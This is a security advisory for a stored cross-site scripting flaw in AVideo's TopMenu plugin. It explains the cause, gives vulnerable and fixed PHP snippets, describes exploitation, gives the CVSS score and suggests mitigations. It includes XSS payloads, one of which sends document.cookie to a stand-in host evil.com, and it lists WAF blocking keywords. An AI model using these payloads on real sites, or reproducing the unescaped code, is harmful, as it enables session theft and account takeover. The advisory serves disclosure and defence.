GHSA-GMPC-FXG2-VCMQ: Stored Cross-Site Scripting (XSS) in AVideo TopMenu Plugin

The AVideo platform, formerly known as YouPHPTube, is an open-source video sharing and streaming application. The TopMenu plugin extends the platform's user interface by allowing administrators to configure custom navigation bars. These navigation elements are injected into all public-facing pages via global plugin hooks.

GHSA-GMPC-FXG2-VCMQ details a stored cross-site scripting (XSS) vulnerability within this plugin. The flaw originates from the insecure rendering of user-controlled menu item properties. Because the plugin processes these values without sanitization, malicious payloads are embedded directly into the Document Object Model (DOM) of the application.

The vulnerability exposes all site visitors to client-side attacks. Any user navigating to a page where the TopMenu hook is active will execute the stored payload. This creates a persistent, high-exposure attack surface that affects unauthenticated visitors and authenticated administrators alike.

The core of this vulnerability is the complete absence of output encoding during HTML generation. The TopMenu plugin constructs the navigation menu by querying configured items from the database. The retrieved data structures include properties for the menu text label, the destination URL, and the CSS classes used for rendering icons.

When iterating over these database records, the PHP backend concatenates the raw string values directly into HTML tags. Standard security practices require passing user-controlled strings through functions like htmlspecialchars() before inclusion in the HTML response. The failure to apply HTML entity encoding allows arbitrary characters, including angle brackets and quote marks, to break out of their intended attribute contexts.

For example, an attacker can input a string containing a closing quote and a closing bracket into the icon class field. The resulting server response will prematurely terminate the icon tag and begin rendering subsequent attacker-supplied tags. This mechanism enables the introduction of arbitrary <script> elements or inline event handlers directly into the page source.

The vulnerability manifests during the HTML generation routine of the TopMenu plugin. While no official patch is currently available, analyzing the rendering logic highlights the exact failure point. The plugin retrieves menu configuration objects and directly injects their properties into anchor tags.

The vulnerable implementation takes the href attribute, the class attribute, and the inner text directly from the stored object.

// Conceptual vulnerable implementation
$iconClass = $menuItem->iconClass;
$url = $menuItem->url;
$label = $menuItem->label;
 
// Direct concatenation without output encoding
$html .= "<a href=\"" . $url . "\">";
$html .= "<i class=\"" . $iconClass . "\"></i> ";
$html .= $label;
$html .= "</a>";

A secure implementation requires explicit context-aware output encoding. The htmlspecialchars() function must be applied with the ENT_QUOTES flag to ensure that both single and double quotes are correctly escaped.

// Conceptual secure implementation
$html .= "<a href=\"" . htmlspecialchars($url, ENT_QUOTES, 'UTF-8') . "\">";
$html .= "<i class=\"" . htmlspecialchars($iconClass, ENT_QUOTES, 'UTF-8') . "\"></i> ";
$html .= htmlspecialchars($label, ENT_QUOTES, 'UTF-8');
$html .= "</a>";

Exploitation requires the attacker to possess the ability to modify the TopMenu plugin configuration. This is typically restricted to administrative users. However, an unauthenticated attacker can achieve this prerequisite by leveraging Cross-Site Request Forgery (CSRF) or by capturing administrative credentials via alternative vectors.

Once access is secured, the attacker navigates to the plugin's configuration interface and injects specific XSS payloads into the vulnerable fields. A payload targeting the icon class field uses "><script>alert(document.cookie)</script> to break out of the class attribute. A payload in the text label field uses "><img src=x onerror=fetch('https://evil.com/?cookie='+document.cookie)> to execute JavaScript upon image load failure.

The persistence mechanism guarantees that the payload remains active until manually removed from the database. When any user requests a page on the AVideo instance, the TopMenu plugin retrieves the configuration and serves the malicious DOM. The payload executes automatically in the victim's browser context without requiring further interaction.

The CVSS 3.1 base score for this vulnerability is 6.1 (Medium), characterized by the vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N. The 'Privileges Required' metric is categorized as None because the ultimate victims of the vulnerability do not need privileges to trigger the execution phase. The 'Scope' metric is Changed, reflecting that the server-side vulnerability directly impacts the client-side environment.

The primary consequence of this vulnerability is the exposure of active session tokens. Attackers can write JavaScript payloads that read document.cookie and exfiltrate the data to an external listener. This leads directly to account takeover, allowing the attacker to impersonate legitimate users or administrators.

Furthermore, the global nature of the TopMenu plugin maximizes the attack surface. Because the navigation bar is rendered universally across the AVideo application, the payload achieves a 100% execution rate for all unique site visitors. This allows for rapid, automated credential harvesting and broad distribution of secondary client-side attacks, such as fake authentication overlays.

As of the publication date, no official patch has been released by the AVideo maintainers. Systems running AVideo up to and including version 26.0 remain vulnerable. Administrators must implement immediate operational workarounds to secure their deployments against this attack vector.

The most effective immediate mitigation is to disable the TopMenu plugin entirely via the AVideo plugin manager. Disabling the plugin prevents the vulnerable rendering logic from executing and eliminates the attack surface. Administrators should rely on default navigation structures until an updated, secure version of the plugin is provided.

For environments where disabling the plugin is not feasible, organizations must deploy strict Web Application Firewall (WAF) rules. These rules should inspect POST requests targeting the TopMenu configuration endpoints and block payloads containing common XSS signatures, such as <script>, onerror, and javascript:. Additionally, security teams should audit the database directly to identify and remove any unauthorized or suspicious menu configuration entries.